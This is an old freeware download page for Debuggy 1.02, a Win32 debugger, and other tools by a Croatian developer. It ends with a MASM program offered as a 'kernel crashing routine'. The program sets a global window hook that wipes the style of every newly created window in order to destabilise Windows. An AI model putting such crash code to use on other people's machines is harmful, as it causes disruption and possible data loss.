| Download:
Debuggy
Version 1.02 (FREEWARE) Download:Debuggy Source Code! Download:X86 code translation library Download: Unprotect your code execution Download: Icon Splitter Download: Capture Express (preview) Download: Inline Calculator //resolve this problem: 5*-2-(4*5.5*-5-198.1992*1.23+(5*sqr(9))/279.24)+5*cos(3.14*2)+sin(3.14*199)-900*3.13 Download: Resource Text Editor Download: Relay Chat //multi client-server funny chat (Croatian language) Download: Peasant Toolz (preview) kernel viewer **NEW**! -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Warning: Don't debug Debuggy itself or with other known debuggers because Windows will surely hangs itself to death! -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ***Debuggy
1.02 Implemented
options: (ONLY W32)*** Last Update:11.09.2003. *** 1st Non BETA Version*** -Native Debugger -Disassembler- -Tracer- -Resource Extractor- -W32 RES Export- [reverse/recompile requirement!] -OLE/COM Viewer- -Window Sniffer- -Instruction Searcher- *NEW* -Value Casting- *NEW* -Kernel Handles Overview- *NEW* -API Spy-Note:Disable API Spy with Process Attach option while debugger raise the threads/DLL's -File Hex Editor- -New Command Line- /A ProcessId [attach on process] /D Filename [start debug process] Author: Vanja Fuckar,EMAIL:INGA@VIP.HR |
|
Visit Croatian freeware site: http://www.cro-web.com/ Collection of free programming
resources,free webmaster's resources and free security resources: |
The Ultimate kernel crashing routine than ever: (U can
use it on your own Risk] {MASM/Author:Vanja Fuckar}
Include Resource Dialog with ID=2
.386
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\gdi32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\gdi32.lib
DLG PROTO :DWORD,:DWORD,:DWORD,:DWORD
HOOK PROTO :DWORD,:DWORD,:DWORD
.data
HK dd 0
.code
start:
invoke GetModuleHandle,0
push eax
invoke SetWindowsHookEx,5,HOOK,eax,0
mov HK,eax
pop eax
invoke DialogBoxParam,eax,2,0,DLG,0
ret
DLG proc Hwnd:DWORD,umsg:DWORD,wparam:DWORD,lparam:DWORD
mov eax,0
ret
DLG endp
HOOK proc uMsg:DWORD,wParam:DWORD,lParam:DWORD
.IF uMsg==HCBT_CREATEWND
invoke SetWindowLong,wParam,GWL_STYLE,0
.endif
invoke CallNextHookEx,HK,uMsg,wParam,lParam
ret
HOOK endp
end start